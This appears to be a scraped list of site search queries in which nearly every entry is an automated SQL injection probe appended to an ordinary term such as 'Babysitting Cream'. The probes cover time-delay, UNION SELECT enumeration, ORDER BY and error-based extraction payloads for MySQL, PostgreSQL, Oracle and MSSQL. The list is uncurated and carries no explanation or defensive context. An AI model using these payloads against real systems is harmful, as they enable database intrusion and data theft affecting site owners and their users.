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  11. Dionakra'&&benchmark(2999999,md5(now()))&&'1
  12. Dionakra' And Benchmark(2999999,md5(now())) And '1
  13. Dionakra'||sleep(3)&&'1
  14. Dionakra'&&sleep(3)&&'1
  15. Dionakra' And Sleep(3) And '1
  16. Dionakra And 1=1
  17. Dionakra" And "x"="y
  18. Dionakra" And "x"="x
  19. Dionakra' And 'x'='y
  20. Dionakra' And 'x'='x
  21. Dionakra And 1>1
  22. Dionakra2121121121212.1
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  26. Babysitting Cream And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric)-- Zgzl
  27. Babysitting Cream Order By 1-- Omnw
  28. Babysitting Cream');select Pg_sleep(5)--
  29. Babysitting Cream');select Dbms_pipe.receive_message(chr(79)||chr(115)||chr(77)||chr(110),5) From Dual--
  30. Babysitting Cream);waitfor Delay '0:0:5'--
  31. Babysitting Cream) Union All Select Null,null,null,null,null,null,null,null,null-- Xboz
  32. Babysitting Cream Order By 3158-- Gtmj
  33. Babysitting Cream) Order By 6949-- Darg
  34. Babysitting Cream) Order By 1-- Yqga
  35. Babysitting Cream%';select Dbms_pipe.receive_message(chr(79)||chr(115)||chr(77)||chr(110),5) From Dual--
  36. Babysitting Cream';select Dbms_pipe.receive_message(chr(79)||chr(115)||chr(77)||chr(110),5) From Dual--
  37. Babysitting Cream);select Dbms_pipe.receive_message(chr(79)||chr(115)||chr(77)||chr(110),5) From Dual--
  38. Babysitting Cream;select Dbms_pipe.receive_message(chr(79)||chr(115)||chr(77)||chr(110),5) From Dual--
  39. Babysitting Cream) Union All Select Null,null,null,null,null,null,null,null,null,null-- Ebcv
  40. \\|
  41. Babysitting Cream) Union All Select Null,null,null,null,null,null,null,null-- Gpmj
  42. Babysitting Cream Union All Select Null,null,null,null,null,null,null,null-- Zlzf
  43. Babysitting Cream) Union All Select Null,null,null,null,null,null,null-- Lkrf
  44. Babysitting Cream Union All Select Null,null,null,null,null,null,null-- Xajj
  45. Babysitting Cream) Union All Select Null,null,null,null,null,null-- Xddm
  46. Babysitting Cream Union All Select Null,null,null,null,null,null-- Idks
  47. Babysitting Cream) Union All Select Null-- Zyjo
  48. Babysitting Cream Union All Select Null,null,null,null,null-- Csql
  49. Babysitting Cream) Union All Select Null,null,null,null-- Tubj
  50. Babysitting Cream Union All Select Null,null,null,null-- Ozpk
  51. Babysitting Cream) Union All Select Null,null,null-- Udmg
  52. Babysitting Cream Union All Select Null,null,null-- Tkpg
  53. Babysitting Cream) Union All Select Null,null-- Ohkl
  54. Babysitting Cream Union All Select Null,null-- Njpj
  55. Babysitting Cream Union All Select Null-- Mlwk
  56. Babysitting Cream%';waitfor Delay '0:0:5'--
  57. Babysitting Cream');waitfor Delay '0:0:5'--
  58. Babysitting Cream';waitfor Delay '0:0:5'--
  59. Babysitting Cream;waitfor Delay '0:0:5'--
  60. Babysitting Cream%';select Pg_sleep(5)--
  61. Babysitting Cream);select Pg_sleep(5)--
  62. Babysitting Cream';select Pg_sleep(5)--
  63. Babysitting Cream;select Pg_sleep(5)--
  64. Babysitting Cream) Union All Select Null,null,null,null,null-- Aksk
  65. (select Char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (3668=3668) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113))
  66. (select (chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (7966=7966) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)))
  67. (select Concat(0x7178787071,(select (elt(6955=6955,1))),0x716a707171))
  68. (select 6195 From(select Count(*),concat(0x7178787071,(select (elt(6195=6195,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a)
  69. Babysitting Cream And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual)-- Uvr
  70. Babysitting Cream%' And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual) And
  71. Babysitting Cream' And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual) And
  72. Babysitting Cream') And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual) And
  73. Babysitting Cream And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual)
  74. Babysitting Cream) And 5414=(select Upper(xmltype(chr(60)||chr(58)||chr(113)||chr(120)||chr(120)||chr(112)||chr(113)||(select (case When (5414=5414) Then 1 Else 0 End) From Dual)||chr(113)||chr(106)||chr(112)||chr(113)||chr(113)||chr(62))) From Dual) And
  75. Babysitting Cream And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113)))-- Pqrr
  76. Babysitting Cream%' And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113))) And '%'='
  77. Babysitting Cream' And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113))) And 'fwkn'='fwkn
  78. Babysitting Cream') And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113))) And ('aafq'='aafq
  79. Babysitting Cream And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113)))
  80. Babysitting Cream) And 1583 In (select (char(113)+char(120)+char(120)+char(112)+char(113)+(select (case When (1583=1583) Then Char(49) Else Char(48) End))+char(113)+char(106)+char(112)+char(113)+char(113))) And (1834=1834
  81. Babysitting Cream%' And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric) And '%'='
  82. Babysitting Cream' And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric) And 'yszj'='yszj
  83. Babysitting Cream') And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric) And ('dkxq'='dkxq
  84. Babysitting Cream And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric)
  85. Babysitting Cream) And 8504=cast((chr(113)||chr(120)||chr(120)||chr(112)||chr(113))||(select (case When (8504=8504) Then 1 Else 0 End))::text||(chr(113)||chr(106)||chr(112)||chr(113)||chr(113)) As Numeric) And (8689=8689
  86. Babysitting Cream And (select 9802 From(select Count(*),concat(0x7178787071,(select (elt(9802=9802,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a)-- Pkvd
  87. Babysitting Cream%' And (select 9802 From(select Count(*),concat(0x7178787071,(select (elt(9802=9802,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a) And '%'='
  88. Babysitting Cream' And (select 9802 From(select Count(*),concat(0x7178787071,(select (elt(9802=9802,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a) And 'puhh'='puhh
  89. Babysitting Cream') And (select 9802 From(select Count(*),concat(0x7178787071,(select (elt(9802=9802,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a) And ('qbhl'='qbhl
  90. Babysitting Cream And (select 9802 From(select Count(*),concat(0x7178787071,(select (elt(9802=9802,1))),0x716a707171,floor(rand(0)*2))x From Information_schema.plugins Group By X)a)
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  282. Restaraunt Games And 2985 In (select (char(113)+char(107)+char(113)+char(107)+char(113)+(select (case When (2985=2985) Then Char(49) Else Char(48) End))+char(113)+char(112)+char(112)+char(122)+char(113)))-- Dure
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